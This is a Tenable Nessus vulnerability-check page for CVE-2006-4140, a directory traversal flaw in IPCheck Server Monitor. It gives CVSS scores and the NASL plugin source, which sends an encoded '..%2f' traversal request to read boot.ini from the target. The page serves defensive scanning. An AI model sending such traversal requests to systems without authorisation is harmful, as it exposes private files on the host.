5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.034 Low
EPSS
Percentile
91.5%
The remote host is running IPCheck Server Monitor, a network resource monitoring tool for Windows.
The installed version of IPCheck Server Monitor fails to filter directory traversal sequences from requests that pass through web server interface. An attacker can exploit this issue to read arbitrary files on the remote host subject to the privileges under which the affected application runs.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description) {
script_id(22205);
script_version("1.16");
script_cve_id("CVE-2006-4140");
script_bugtraq_id(19473);
script_name(english:"IPCheck Server Monitor Traversal Arbitrary File Access");
script_summary(english:"Checks for directory traversal vulnerability in IPCheck Server Monitor");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to a directory traversal attack." );
script_set_attribute(attribute:"description", value:
"The remote host is running IPCheck Server Monitor, a network resource
monitoring tool for Windows.
The installed version of IPCheck Server Monitor fails to filter
directory traversal sequences from requests that pass through web
server interface. An attacker can exploit this issue to read
arbitrary files on the remote host subject to the privileges under
which the affected application runs." );
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/442822/30/0/threaded" );
script_set_attribute(attribute:"see_also", value:"https://www.paessler.com/ipcheck/history" );
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/444227/30/0/threaded" );
script_set_attribute(attribute:"solution", value:
"Upgrade to IPCheck Server Monitor version 5.3.3.639/640 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2006/08/14");
script_set_attribute(attribute:"vuln_publication_date", value: "2006/08/10");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 8080);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:8080);
# Make sure it's IPCheck Server Monitor.
banner = get_http_banner(port:port);
if (!banner || "Server: IPCheck/" >!< banner) exit(0);
# Try to exploit the issue to read a local file.
file = "boot.ini";
r = http_send_recv3(method:"GET", item:string("/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f", file), port:port,
add_headers: make_array("Host", get_host_ip()));
if (isnull(r)) exit(0);
res = r[2];
# There's a problem if looks like boot.ini.
if ("[boot loader]">< res) {
report = string(
"\n",
"Here are the contents of the file '\\boot.ini' that Nessus was\n",
"able to read from the remote host :\n",
"\n",
res
);
security_warning(port:port, extra:report);
}